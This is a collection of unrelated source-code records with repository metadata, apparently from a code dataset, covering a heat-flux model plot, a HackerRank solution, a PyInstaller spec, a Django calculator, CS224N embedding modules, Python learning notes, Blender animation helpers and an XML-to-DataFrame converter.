timesteps = np.shape(benchmark_data)[0]
for idx, item in enumerate(config.scaler):
benchmark_traj[:,:,idx] = benchmark_traj[:,:,idx]/item
for t in tqdm(range(timesteps-extp_size)):
predictions = model.predict(
benchmark_traj
)[0]
pre_part = benchmark_traj[:,1:,:]
post_part = np.array([predictions[0], predictions[1], benchmark_data[t+extp_size,3]/config.scaler[2], benchmark_data[t+extp_size,4]/config.scaler[3], benchmark_data[t+extp_size,5]/config.scaler[4]]).reshape(1,1,np.shape(benchmark_traj)[2])
benchmark_traj = np.concatenate((pre_part, post_part), axis=1)
outputs_ = np.vstack((outputs_, predictions))
x_axis = benchmark_data[:,0][:timesteps]
true_hf = benchmark_data[:,1][:timesteps]
true_temp = benchmark_data[:,2][:timesteps]
est_hf = outputs_[:,0]*config.scaler[0]
est_temp = outputs_[:,1]*config.scaler[1]
plt.figure()
plt.subplot(211)
plt.plot(x_axis, true_hf, 'b-', label='True heat flux')
plt.plot(x_axis, est_hf, 'g--', label='Estimated heat flux')
plt.legend()
plt.subplot(212)
plt.plot(x_axis, true_temp, 'r-', label='True temperature')
plt.plot(x_axis, est_temp, 'k--', label='Estimated temperature')
plt.legend()
plt.savefig('../figure/{0}/{1}_{2}_extp{3}.png'.format(date, benchmark_name[:-4], model_name, extp_size), dpi=300)
plt.show()
| [
"[email protected]"
] | |
cf524498c3c354af1507470178228b9d04709912 | 9ab59fd67ef2ab343cc3036d2f9d0ad68ab887c5 | /Python/word order.py | 16a8fbd52ea859f51078c0bf030ace2c343c62d0 | [] | no_license | Arifuzzaman-Munaf/HackerRank | ff094dfc6d8a618ab9c54db4460c5190c81583bf | 5fd9b6ffa3caf3afddba5d6f35978becf989d3b8 | refs/heads/main | 2023-06-16T01:09:11.371654 | 2021-07-14T15:28:53 | 2021-07-14T15:28:53 | 385,230,007 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 278 | py | n = int(input())
distinct = {}
for i in range(n):
word = input()
if word not in distinct :
distinct[word] = 1
else :
distinct[word] = distinct[word] + 1
print(len(distinct))
for i in distinct.values():
print(i , end=' ')
| [
"[email protected]"
] | |
d86627e50f23f2b9e75214dbd1da6239295523e1 | 4e7faaa81c7d46e3a3f98fe8ae3686809485a5f5 | /main.spec | a2b2a2f4ecdca508da6f590f7771e7bc466aa96c | [] | no_license | sayntan4u/phoenix | 7122f32f9ba8c6e8dbe6507ef3ad0f7806898f2d | 438903301cc057dc425f04cd120ae3f373e58e30 | refs/heads/main | 2023-07-11T07:40:30.676620 | 2021-08-22T16:43:52 | 2021-08-22T16:43:52 | 398,310,782 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,213 | spec | # -*- mode: python ; coding: utf-8 -*-
block_cipher = None
a = Analysis(['main.py'],
pathex=['C:\\Users\\Sayantan\\Desktop\\test\\generated_code'],
binaries=[],
datas=[],
hiddenimports=[],
hookspath=[],
hooksconfig={},
runtime_hooks=[],
excludes=[],
win_no_prefer_redirects=False,
win_private_assemblies=False,
cipher=block_cipher,
noarchive=False)
pyz = PYZ(a.pure, a.zipped_data,
cipher=block_cipher)
exe = EXE(pyz,
a.scripts,
[],
exclude_binaries=True,
name='main',
debug=False,
bootloader_ignore_signals=False,
strip=False,
upx=True,
console=True,
disable_windowed_traceback=False,
target_arch=None,
codesign_identity=None,
entitlements_file=None )
coll = COLLECT(exe,
a.binaries,
a.zipfiles,
a.datas,
strip=False,
upx=True,
upx_exclude=[],
name='main')
| [
"[email protected]"
] | |
595b484f51cb641a44fd9d996752f386eb520b68 | 49f5d57221f9715a635669380da1facad93d29cf | /rest_api_calculator/calc/utils.py | 064db2f2b216d24ef6f191166f6b241ddb04cd0c | [] | no_license | marimuthuei/django-rest | 35aef6253b8b7c6d5cbd348accee304ad40a3e9c | 8398ef89f7f728b9d6d7af0384ee54667b7466e1 | refs/heads/master | 2022-04-30T17:42:09.286819 | 2021-04-15T07:39:22 | 2021-04-15T07:39:22 | 209,269,881 | 1 | 0 | null | 2022-04-22T22:24:18 | 2019-09-18T09:27:21 | Python | UTF-8 | Python | false | false | 897 | py | import math
from rest_framework.exceptions import APIException, ValidationError
from core.settings import FACTORIAl_MAX
def calculator(operator, a, b):
result = None
try:
if operator == "add":
result = a + b
elif operator == "sub":
result = a - b
elif operator == "mul":
result = a * b
elif operator == "div":
result = a / b
elif operator == "sqrt":
result = math.sqrt(a)
elif operator == "pow":
result = math.pow(a, b)
elif operator == "fact":
if 0 <= a <= FACTORIAl_MAX:
result = math.factorial(a)
else:
raise ValidationError("Factorial number computation limited to 15.")
except Exception as ex:
raise APIException("calc error : " + str(ex))
return result
| [
"[email protected]"
] | |
a7d182b1f7306bd17a60d4829a749ec58ebd4878 | cce056258115ff589a658d5cb3187e4145471e3f | /2020 Spring:natural language process/EXP 4:CNN-based NMT/代码/model_embeddings.py | 5df1c84c17500d1f365c21c18debea7b972341ff | [] | no_license | huochf/Course-Experiments | cd74c2de92a02bea9565d349fefefd8fa76997b4 | a91fd21582b3ac5d8fcaf1f12c4f0814cc4675db | refs/heads/master | 2023-06-08T08:43:49.962942 | 2020-09-24T01:53:24 | 2020-09-24T01:53:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,488 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
CS224N 2019-20: Homework 5
model_embeddings.py: Embeddings for the NMT model
Pencheng Yin <[email protected]>
Sahil Chopra <[email protected]>
Anand Dhoot <[email protected]>
Michael Hahn <[email protected]>
"""
import torch
import torch.nn as nn
# Do not change these imports; your module names should be
# `CNN` in the file `cnn.py`
# `Highway` in the file `highway.py`
# Uncomment the following two imports once you're ready to run part 1(j)
from cnn import CNN, WordCNN, WordLSTM
from highway import Highway, SelectiveConnect
# End "do not change"
class ModelEmbeddings(nn.Module):
"""
Class that converts input words to their CNN-based embeddings.
"""
def __init__(self, word_embed_size, vocab):
"""
Init the Embedding layer for one language
@param word_embed_size (int): Embedding size (dimensionality) for the output word
@param vocab (VocabEntry): VocabEntry object. See vocab.py for documentation.
Hints: - You may find len(self.vocab.char2id) useful when create the embedding
"""
super(ModelEmbeddings, self).__init__()
### YOUR CODE HERE for part 1h
self.word_embed_size = word_embed_size
self.vocab = vocab
self.e_char = 50
padding_idx = self.vocab.char_pad
self.char_embedding = nn.Embedding(len(self.vocab.char2id), self.e_char, padding_idx=padding_idx)
self.cnn = CNN(embed_size=self.e_char, num_filter=self.word_embed_size)
self.highway = Highway(embedd_size=self.word_embed_size)
self.dropout = nn.Dropout(p=0.3)
### END YOUR CODE
def forward(self, input):
"""
Looks up character-based CNN embeddings for the words in a batch of sentences.
@param input: Tensor of integers of shape (sentence_length, batch_size, max_word_length) where
each integer is an index into the character vocabulary
@param output: Tensor of shape (sentence_length, batch_size, word_embed_size), containing the
CNN-based embeddings for each word of the sentences in the batch
"""
### YOUR CODE HERE for part 1h
X_words_emb = []
for X_padded in input:
X_emb = self.char_embedding(X_padded) # batch_size x max_word_length x char_embed_size
X_reshaped = torch.transpose(X_emb, dim0=1, dim1=2)
X_conv_out = self.cnn(X_reshaped)
X_highway = self.highway(X_conv_out)
X_word_emb = self.dropout(X_highway)
X_words_emb.append(X_word_emb)
X_words_emb = torch.stack(X_words_emb)
return X_words_emb
### END YOUR CODE
class ModelEmbeddings_2(nn.Module):
def __init__(self, word_embed_size, vocab):
super(ModelEmbeddings_2, self).__init__()
self.word_embed_size = word_embed_size
self.vocab = vocab
self.e_char = 50
padding_idx = self.vocab.char_pad
self.char_embedding = nn.Embedding(len(self.vocab.char2id), self.e_char, padding_idx=padding_idx)
self.cnn = CNN(embed_size=self.e_char, num_filter=self.word_embed_size)
self.highway = Highway(embedd_size=self.word_embed_size)
def forward(self, input):
X_words_emb = []
for X_padded in input:
X_emb = self.char_embedding(X_padded) # batch_size x max_word_length x char_embed_size
X_reshaped = torch.transpose(X_emb, dim0=1, dim1=2)
X_conv_out = self.cnn(X_reshaped)
X_highway = self.highway(X_conv_out)
X_words_emb.append(X_highway)
X_words_emb = torch.stack(X_words_emb)
return X_words_emb
class ContexAwareEmbeddings(nn.Module):
def __init__(self, word_embed_size, vocab):
super(ContexAwareEmbeddings, self).__init__()
self.word_embed_size = word_embed_size
self.word_embedding = ModelEmbeddings_2(word_embed_size, vocab)
self.contex_cnn = WordCNN(word_embed_size=word_embed_size, num_filter=word_embed_size)
self.connect = SelectiveConnect(word_embed_size)
self.dropout = nn.Dropout(p=0.3)
def forward(self, input):
X_words_emb = self.word_embedding(input) # sentence_L x batch_size x word_embed_size
X_words_emb_reshaped = X_words_emb.permute(1, 2, 0) # batch_size x word_embed_size x sentence_L
X_contex = self.contex_cnn(X_words_emb_reshaped) # batch_size x word_embed_size x sentence_L
X_contex = X_contex.permute(2, 0, 1) # sentence_L x batch_size x word_embed_size
X_contex_embedding = self.connect(X_contex, X_words_emb)
#X_contex_embedding = self.dropout(X_contex_embedding)
return X_contex_embedding
class ContexAwareEmbeddings_LSTM(nn.Module):
def __init__(self, word_embed_size, vocab):
super(ContexAwareEmbeddings_LSTM, self).__init__()
self.word_embed_size = word_embed_size
self.word_embedding = ModelEmbeddings_2(word_embed_size, vocab)
self.contex_lstm = WordLSTM(word_embed_size=word_embed_size)
self.connect = SelectiveConnect(word_embed_size)
self.dropout = nn.Dropout(p=0.3)
def forward(self, input):
X_words_emb = self.word_embedding(input)
X_contex_lstm = self.contex_lstm(X_words_emb)
X_contex_embedding = self.connect(X_contex_lstm, X_words_emb)
#X_contex_embedding = self.dropout(X_contex_embedding)
return X_contex_embedding | [
"[email protected]"
] | |
0343fcf7a0ecf13d0cf6070e68aaf6fa43ea727c | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/stringMethods_20200707100259.py | 8206fc5fa46489851f957ce0776ea9caca48fe98 | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 137 | py | def array(arr):
newArr = []
for i in range(len(arr)):
b =
print(arr[i])
array(["[6,7,5]","[1,8]"]) | [
"[email protected]"
] | |
bb13231f9aae7da4c5b2abdbf83c6c30bc07505f | 84784ef7333ae07ab36c9f40f604a6c1ac36ce17 | /Functions and Write Commands.py | 6fd0586f9f5221849bd999973c692ff775befaa3 | [] | no_license | riteshtripathi2010/Python-Learning | cf530e929adacd21611ab05f2571049b2de11982 | 969ff1041cf25f5735ec5b20fd14ee26fa1bbc83 | refs/heads/master | 2021-07-07T01:07:00.951608 | 2020-10-16T15:39:58 | 2020-10-16T15:39:58 | 187,281,914 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,467 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 30 19:05:45 2020
@author: riteshtripathi
"""
#Files and Functions
#write a code and bring that code whenever i need it
#File Handling
#File Handling can Open, Close, Read, Write
#f = open('kipling.txt','w') #even if this file isnt created, it will still open it
#the w is for writing in the file
#print(type(f))
# #Writing first to file
# f.write('If you can keep your head while all about you \nare losing theirs\
# #and blaming it on you,\n')
# f.write('If you can trust yourself when all men doubt you,\n\
# But make allowance for their doubting too;\n')
# #
# f.write('If you can wait and not be tired by waiting,\n\
# Or being lied about, don\'t deal in lies,\n')
# #
# f.write('Or being hated, don\'t give way to hating,\n\
# And yet don\'t look too good, nor talk too wise:\n')
# #
# f.close()
#now check the file 'kipling' is in the file explorer
#Now lets Read the file
# f = open('kipling.txt','r')
# print(type(f))
# #
# print(f.read())
# f.close()
#if you want to handle line by line, then there is this readLine command
# f = open('kipling.txt','r')
# print(f.readline())
# f.close()
# print() #this will give you the first line of the text
# f = open('kipling.txt','r')
# #
# print(type(f))
# #
# content = f.readlines()#i have stored in the variable because i want to iterate and find line by line
# f.close()
# #Appendto a file
# f = open('kipling.txt','a')
# f.write('If you can dream - and not make dreams your master;\n\
# If you can think - and not make thoughts your aim;\n')
# f.close()#after appending, we need to close the file
# print()
# #this will append from the last line
# #then we need to read that file with the new line
# f = open('kipling.txt','r')
# print(f.read())
# f.close()
# print()
#FUNCTIONS
#Some built in function in Python: MIn, Max, Sum
#lets use our own custom function called Modular Programming / Few Errors
#Wriitng your function makes programming more modular and it reduces potential errors
#Print Hello World function
# def Hello():
# print('Hello World')
# #i have created a function called hello, and it will not run unless i call it
# Hello()
# for i in range(5):
# Hello()#this will print the function 5 times
# #A function can take an argument
# def hi(name):
# print(f'Hello, {name}!')
# #here name is an input
# #lets call the function
# hi('Ritesh')
# #i can pass varibales to a function
# #in above, if i dont pass in any name, python will throw error
# #to solve that, check the code below
# def hi_2(name='Ritesh'):
# print(f'Hello, {name}!')
# hi_2()
# #if i dont pass any parameter, by default, hi_2 will take as Ritesh
#Fibonacci Sequence in a FUNCTION
#Normally for Fibonacci, we could write code as below
# n=20
# a = 0
# b = 1
# for i in range(n):
# a,b = b,a+b
# print(a)
#now lets write above code in a function and we dont have to write that code ever
# def fib(n):
# #''' Calculates and returns the nth fibonacci number'''
# a = 0
# b = 1
# for i in range(n):
# a,b = b,a+b
# return a
# fib_num = fib(20)
# print(fib_num)
# for i in range(20):
# print(fib(i))
# #this will calculate finonacci series from 1 to 20
# #lets create another function
# def calc_mean(first,*remainder):
# '''
# # This calculates the mean of numbers.
# # '''
# mean = (first + sum(remainder))/ (1 + len(remainder))
# print(type(remainder))
# return mean
# print(calc_mean(23,43,56,76,45,34,65,78,975,3456,54))
# # Docstring: with three ''' lets other user to knwo what this function is doing
# #above, *remainder tells python we dont know how many inputs we are going to get, handle it
# #in short, * can handle whatever lenght we give to the function, it can handle
#Recursion
# #in a fucntion you can call the function by itself and its called Recursion
# #Recursion can create memory drainage
# def fib_2(n):
# if n == 0:
# return 0
# elif n == 1:
# return 1
# else:
# return fib_2(n-1) + fib_2(n-2)
# #All recurscive functions need base case, they need to resolve for something or else it will keep running forever
# #here base case is 0 and 1, it will keep checking for 0 and 1, as soon as it equals to 0 and 1
# #it will not call any functions
# #untill these base case have gone to more than 1
# x = fib_2(20)
# print(x)
#skipped more on fibonnaci numbers like a min video,
#because using recursion method takes fib function to execute in 25mins
#iterative function is less by 25mins faster
#so far we have created three function and all those functions are saved under one file called
#Files and Functions
#i can open FIles and Functions in other page by calling that file name and then dot to access each function
# #Eg
# import FilesandFunction
# x = FilesandFunctions.fib(20)
#this is called MODULE
#More on Functions
#A function can return more than one value
#its done by tuple of values
# def sum_and_mult(a,b):
# total = a + b
# product = a * b
# return total, product
# #above returns sum and product of two values
# #lets call the function
# func_call = sum_and_mult(3,4)
# print(func_call)
# print(type(func_call))
# #another way of returning tuple values
# var_1, var_2 = sum_and_mult(6,7)
# #here var1 will return the addition of 6 and 7
# #here var2 will return the multiplication of 6 and 7
# #Another point to note,
# #a variable declared outside the function will be differetn from the variables
# #defined inside the function
# var_3 = 5
# var_4 = 6
# #
# def add1(var_3,var_4):
# var_3 = var_3 + 1
# var_4 = var_4 + 1
# print(f'Inside the function var_3 = {var_3} and var_4 = {var_4}')
# return var_3,var_4
# #
# add1(18,19)
# print(f'But outside the function var_3 = {var_3} and var_4 = {var_4}')
# #above code is self explanotary
# #another point to note
# #if you put mutable values inside the function,
# #those values willlll change
# def lengthen_list(n,my_list = [1,2,3]):#here it takes values n and my_list
# #but if my_list hasnt been given value, by default it would be 1,2,3
# my_list.append(n)
# return my_list
# x = lengthen_list(4)
# #this is like the first call
# x = lengthen_list(4)
# ##this is like the second call
# x = lengthen_list(4)
# #this is like the third call
# #whats happening above is that, values 1,2,3
# #will get append first time by 4
# #the number of times x is shown, the value will keep appending
# #reuslts 1,2,3,4,4,4,
# #inshort everytime we call x, it will keep appending and we dont want that
# #rather we code:
# def lengthen_list_2(n,my_list = None):
# if my_list == None:#checking the condition, if its true
# my_list = [1,2,3]
# my_list.append(n)
# return my_list
# #y = lengthen_list_2(4)
# ##
# #y = lengthen_list_2(4)
# ##
# #y = lengthen_list_2(4)
#main thing to note, we need to define function before we call it
# def multi_ply(a,b):
# return a * b
# p = multi_ply(3,4)
#Practical Tests
#Question 1
#Create a function that will calculate the sum of two numbers. Call it sum_two.
# def sum_two(a,b):
# '''This function returns the sum of two numbers'''
# return a + b
# print(f'The sum of 3 and 4 is {sum_two(3,4)}' )
# Question 2
# Write a function that performs multiplication of two arguments. By default the
# function should multiply the first argument by 2. Call it multiply.
# def multiply(a,b=2):
# '''
# Returns the product of a and b; if b not given
# returns 2 * a.
# '''
# return a * b
# #
# print(f'Inputting 3 gives {multiply(3)}')
# print(f'Inputting 3 and 5 gives {multiply(3,5)}')
#Question 3
#Write a function to calculate a to the power of b. If b is not given
#its default value should be 2. Call it power.
#'''
# def power(a,b=2):
# '''
# Returns a**b; if b not given,
# it will return a**2
# '''
# return a ** b
# print(f'Inputting 8 gives {power(8)}')
# print(f'Inputting 2 and 8 gives {power(2,8)}')
##Question 4
##Create a new file called capitals.txt , store the names of five capital cities
##in the file on the same line.
##'''
#file = open('capitals.txt','w')
#file.write('London, ')
#file.write('Paris, ')
#file.write('Madrid, ')
#file.write('Lisbon, ')
#file.write('Rome,')
#file.close()
#Question 5
#Write some code that requests the user to input another capital city.
#Add that city to the list of cities in capitals. Then print the file to
#the screen.
#'''
#user_input = input('Plese enter a capital city:> ')
#
#file = open('capitals.txt','a')
#file.write('\n' + user_input)
#file.close
#
#file = open('capitals.txt','r')
#print(file.read())
#file.close
#Question 6
#Write a function that will copy the contents of one file to a new file.
# '''
# def copy_file(infile,outfile):
# ''' Copies the contents of infile to a new file, outfile.'''
# with open(infile) as file_1:
# with open(outfile, "w") as file_2:
# file_2.write(file_1.read())
# copy_file('capitals.txt','new_capitals.txt')
| [
"[email protected]"
] | |
31c8805acb94964e9727c888e6b71f3bacfefb7f | e82b761f53d6a3ae023ee65a219eea38e66946a0 | /All_In_One/addons/commotion/helpers.py | 9e9244763a1c14490e6638133246a23eaba87248 | [] | no_license | 2434325680/Learnbgame | f3a050c28df588cbb3b14e1067a58221252e2e40 | 7b796d30dfd22b7706a93e4419ed913d18d29a44 | refs/heads/master | 2023-08-22T23:59:55.711050 | 2021-10-17T07:26:07 | 2021-10-17T07:26:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,875 | py | import bpy
def show_error_message(message):
def draw(self, context):
self.layout.label(message)
bpy.context.window_manager.popup_menu(draw, title='Error', icon='ERROR')
def shape_list_refresh(context):
scene = context.scene
skcoll = scene.commotion_skcoll
if hasattr(scene, 'commotion_skcoll'):
for sk in skcoll:
skcoll.remove(0)
i = 0
for kb in context.active_object.data.shape_keys.key_blocks:
skcoll.add()
skcoll[i].name = kb.name
skcoll[i].index = i
i += 1
def update_sp(self, context):
scene = context.scene
skcoll = scene.commotion_skcoll
props = scene.commotion
key = context.active_object.data.shape_keys
if key.use_relative:
for sk in skcoll:
if sk.selected:
key.key_blocks[sk.index].value = props.shape_value
else:
for ob in context.selected_objects:
for sk in skcoll:
if sk.selected:
ob.data.shape_keys.key_blocks[sk.index].interpolation = props.shape_interpolation
def auto_keyframes(context):
frame = context.scene.frame_current
for ob in context.selected_objects:
key = ob.data.shape_keys
key.eval_time = int(key.key_blocks[1].frame)
key.keyframe_insert(data_path='eval_time', frame=frame)
key.eval_time = int(key.key_blocks[-1].frame)
key.keyframe_insert(data_path='eval_time', frame=frame + 20)
def keyframes_offset(fcus, i, context):
frame = context.scene.frame_current
for fcu in fcus:
fcu_range = fcu.range()[0]
for kp in fcu.keyframe_points:
kp.co[0] = kp.co[0] + frame + i - fcu_range
kp.handle_left[0] = kp.handle_left[0] + frame + i - fcu_range
kp.handle_right[0] = kp.handle_right[0] + frame + i - fcu_range
def strips_offset(strip, i, context):
frame = context.scene.frame_current
strip.frame_end = frame - 1 + i + strip.frame_end
strip.frame_start = frame + i
strip.scale = 1
def data_access(mode, ob, i, context):
if 'FCURVES' in mode:
if 'SHAPE_KEYS' in mode:
fcus = ob.data.shape_keys.animation_data.action.fcurves
elif 'OBJECT' in mode:
fcus = ob.animation_data.action.fcurves
keyframes_offset(fcus, i, context)
elif 'NLA' in mode:
if 'SHAPE_KEYS' in mode:
strip = ob.data.shape_keys.animation_data.nla_tracks[0].strips[0]
elif 'OBJECT' in mode:
strip = ob.animation_data.nla_tracks[0].strips[0]
strips_offset(strip, i, context)
elif 'PARENT' in mode:
ob.use_slow_parent = True
ob.slow_parent_offset = i
def offset_cursor(offset, threshold, mode, context):
cursor = context.scene.cursor_location
dist = {}
for ob in context.selected_objects:
distance = (cursor - (ob.location + ob.delta_location)).length
dist[ob] = distance
if 'REVERSE' in mode:
dist = sorted(dist, key=dist.get, reverse=True)
else:
dist = sorted(dist, key=dist.get)
i = 0
i2 = threshold
for ob in dist:
data_access(mode, ob, i, context)
if i2 > 1:
if i2 <= (dist.index(ob) + 1):
i2 += threshold
i += offset
else:
i += offset
def offset_name(offset, threshold, mode, context):
obs = context.selected_objects
dist = {}
for ob in obs:
dist[ob] = ob.name
if 'REVERSE' in mode:
dist = sorted(dist, key=dist.get, reverse=True)
else:
dist = sorted(dist, key=dist.get)
i = 0
i2 = threshold
for ob in dist:
data_access(mode, ob, i, context)
if i2 > 1:
if i2 <= (dist.index(ob) + 1):
i2 += threshold
i += offset
else:
i += offset
def offset_parent(offset, context):
mode = ['PARENT']
dist = {}
for ob in context.selected_objects:
if ob.parent:
distance = (ob.parent.location - (ob.location + ob.delta_location + ob.parent.location)).length
dist[ob] = distance
dist = sorted(dist, key=dist.get)
i = 0 + offset
for ob in dist:
data_access(mode, ob, i, context)
i += offset
def offset_multitarget(objects, targets, offset, threshold, mode, context):
obs = {}
for ob in objects:
targs = {}
for t in targets:
distance = (t.location - (ob.location + ob.delta_location)).length
targs[distance] = t
dist = sorted(targs)[0]
obs[ob] = [dist, targs[dist]]
for t in targets:
obs_thold = []
i = 0
i2 = threshold
if 'REVERSE' in mode:
obs_sorted = sorted(obs, key=obs.get, reverse=True)
else:
obs_sorted = sorted(obs, key=obs.get)
for ob in obs_sorted:
if obs[ob][1] == t:
data_access(mode, ob, i, context)
if i2 > 1:
obs_thold.append(ob)
if i2 <= (obs_thold.index(ob) + 1):
i += offset
i2 += threshold
else:
i += offset
def create_nla_tracks(anim):
frst_frame = anim.action.frame_range[0]
if not anim.nla_tracks:
anim.nla_tracks.new()
anim.nla_tracks[0].strips.new('name', frst_frame, anim.action)
anim.action = None
def create_strips(mode, context):
obs = context.selected_objects
if 'SHAPE_KEYS' in mode:
for ob in obs:
if ob.data.shape_keys:
anim = ob.data.shape_keys.animation_data
else:
return show_error_message('Selected objects have no Shape Keys')
create_nla_tracks(anim)
elif 'OBJECT' in mode:
for ob in obs:
if ob.animation_data:
anim = ob.animation_data
else:
return show_error_message('Selected objects have no Animation')
create_nla_tracks(anim)
def link_strips(obj_strip, ob_strip):
obj_a_s = obj_strip.action_frame_start
obj_a_e = obj_strip.action_frame_end
ob_strip.action = obj_strip.action
ob_strip.action_frame_start = obj_a_s
ob_strip.action_frame_end = obj_a_e
def link_to_active(mode, context):
obj = context.active_object
obs = context.selected_objects
if 'NLA' in mode:
if 'SHAPE_KEYS' in mode:
obj_strip = obj.data.shape_keys.animation_data.nla_tracks[0].strips[0]
for ob in obs:
ob_strip = ob.data.shape_keys.animation_data.nla_tracks[0].strips[0]
link_strips(obj_strip, ob_strip)
elif 'OBJECT' in mode:
obj_strip = obj.animation_data.nla_tracks[0].strips[0]
for ob in obs:
ob_strip = ob.animation_data.nla_tracks[0].strips[0]
link_strips(obj_strip, ob_strip)
elif 'FCURVES' in mode:
if 'SHAPE_KEYS' in mode:
action = obj.data.shape_keys.animation_data.action
for ob in obs:
if ob.data.shape_keys.animation_data:
ob.data.shape_keys.animation_data.action = action
else:
ob.data.shape_keys.animation_data_create()
ob.data.shape_keys.animation_data.action = action
elif 'OBJECT' in mode:
action = obj.animation_data.action
for ob in obs:
if ob.animation_data:
ob.animation_data.action = action
else:
ob.animation_data_create()
ob.animation_data.action = action
def copy_to_selected(mode, context):
obj = context.active_object
obs = context.selected_objects
if 'SHAPE_KEYS' in mode:
action = obj.data.shape_keys.animation_data.action
for ob in obs:
if ob.data.shape_keys:
if ob.data.shape_keys.animation_data:
ob.data.shape_keys.animation_data.action = action.copy()
else:
ob.data.shape_keys.animation_data_create()
ob.data.shape_keys.animation_data.action = action.copy()
else:
return show_error_message('Selected objects have no Shape Keys')
elif 'OBJECT' in mode:
action = obj.animation_data.action
for ob in obs:
if ob.animation_data:
ob.animation_data.action = action.copy()
else:
ob.animation_data_create()
ob.animation_data.action = action.copy()
def remove_nla_track(anim):
trks = anim.nla_tracks
anim.action = trks[0].strips[0].action
trks.remove(trks[0])
def strips_to_fcurves(mode, context):
obs = context.selected_objects
if 'SHAPE_KEYS' in mode:
for ob in obs:
anim = ob.data.shape_keys.animation_data
remove_nla_track(anim)
elif 'OBJECT' in mode:
for ob in obs:
anim = ob.animation_data
remove_nla_track(anim)
def sync_len(mode, context):
obs = context.selected_objects
if 'SHAPE_KEYS' in mode:
for ob in obs:
strip = ob.data.shape_keys.animation_data.nla_tracks[0].strips[0]
strip.action_frame_end = (strip.action_frame_start + strip.action.frame_range[1] - 1)
elif 'OBJECT' in mode:
for ob in obs:
strip = ob.animation_data.nla_tracks[0].strips[0]
strip.action_frame_end = (strip.action_frame_start + strip.action.frame_range[1] - 1)
def driver_set(context):
obj = context.active_object
try:
for ob in context.selected_objects:
if ob != obj:
key = ob.data.shape_keys
kb = int(key.key_blocks[1].frame)
kb_last = str(int(key.key_blocks[-1].frame) + 5)
key.driver_add('eval_time')
fcus = ob.data.shape_keys.animation_data.drivers
for fcu in fcus:
if fcu.data_path == 'eval_time':
drv = fcu.driver
drv.type = 'SCRIPTED'
drv.expression = kb_last + '-(dist*3/sx)'
drv.show_debug_info = True
var = drv.variables.new()
var.name = 'dist'
var.type = 'LOC_DIFF'
var.targets[0].id = ob
var.targets[1].id = obj
var = drv.variables.new()
var.name = 'sx'
var.type = 'SINGLE_PROP'
var.targets[0].id = obj
var.targets[0].data_path = 'scale[0]'
if fcu.modifiers:
fcu.modifiers.remove(fcu.modifiers[0])
fcu.keyframe_points.insert(0, kb)
fcu.keyframe_points.insert(kb, kb)
fcu.keyframe_points.insert(kb + 10, kb + 10)
fcu.extrapolation = 'LINEAR'
for kp in fcu.keyframe_points:
kp.interpolation = 'LINEAR'
except:
return show_error_message('Selected objects have no Shape Keys')
def targets_remap(context):
for ob in context.selected_objects:
fcus = ob.data.shape_keys.animation_data.drivers
for fcu in fcus:
if fcu.data_path == 'eval_time':
for var in fcu.driver.variables:
if var.name == 'dist':
var.targets[0].id = ob
def expression_copy(context):
active_fcus = context.active_object.data.shape_keys.animation_data.drivers
for active_fcu in active_fcus:
if active_fcu.data_path == 'eval_time':
for ob in context.selected_objects:
fcus = ob.data.shape_keys.animation_data.drivers
for fcu in fcus:
if fcu.data_path == 'eval_time':
fcu.driver.expression = active_fcu.driver.expression
def dist_trigger(var, name):
etm = bpy.context.scene.objects[name].data.shape_keys.eval_time
if var > etm:
etm = var
return etm
def register_driver_function(context):
bpy.app.driver_namespace['dist_trigger'] = dist_trigger
for ob in context.scene.objects:
if (ob.data and ob.data.shape_keys and
ob.data.shape_keys.animation_data and
ob.data.shape_keys.animation_data.drivers):
fcus = ob.data.shape_keys.animation_data.drivers
for fcu in fcus:
if fcu.data_path == 'eval_time':
fcu.driver.expression = fcu.driver.expression
def expression_func_set(context):
props = context.scene.commotion
expr = props.sk_drivers_expression_func
for ob in context.selected_objects:
func_expr = "dist_trigger(%s, '%s')" % (expr, ob.name)
fcus = ob.data.shape_keys.animation_data.drivers
for fcu in fcus:
if fcu.data_path == 'eval_time':
fcu.driver.expression = func_expr
| [
"[email protected]"
] | |
8b692184b386024af060eee707d4abc263e016b8 | 2b2ac45bd210a2dc9ba95ee8d43d72017148a060 | /xml2df.py | 36dab35727b7f753eed400c5226f6310de41f3e3 | [] | no_license | luqiang21/small_useful_tools | f45c2e85f748d6e3c197b775051cb175059c409e | 10e0f41e0293badb7f44daa0e4585a0d68f658bb | refs/heads/master | 2021-01-17T12:29:41.766066 | 2018-01-08T23:20:29 | 2018-01-08T23:20:29 | 95,399,569 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,174 | py | '''read xml file as dataframe'''
import xml.etree.ElementTree as ET
import pandas as pd
def xml2df(xml_file):
xml_data = open(xml_file).read()
root = ET.XML(xml_data) # element tree
all_records = []
for i, child in enumerate(root):
record = {}
for subchild in child:
record[subchild.tag] = subchild.text
all_records.append(record)
print len(all_records)
return pd.DataFrame(all_records)
xml_file = 'youXMLFile'
df = xml2df(xml_file)
from lxml import objectify
import pandas as pd
def xml2df_(path):
xml = objectify.parse(open(path))
root = xml.getroot()
columns = []
for element in root.getchildren()[0].getchildren():
# print element.tag
columns.append(element.tag)
root.getchildren()[0].getchildren()
n = len(root.getchildren())
row_s = []
for i in range(0,n):
obj = root.getchildren()[i].getchildren()
row = {}
for idx in range(len(columns)):
column = columns[idx]
row[column] = obj[idx].text
row_s.append(row)
df = pd.DataFrame(row_s)
return df
df2 = xml2df_(xml_file)
df2.head()
| [
"[email protected]"
] | |
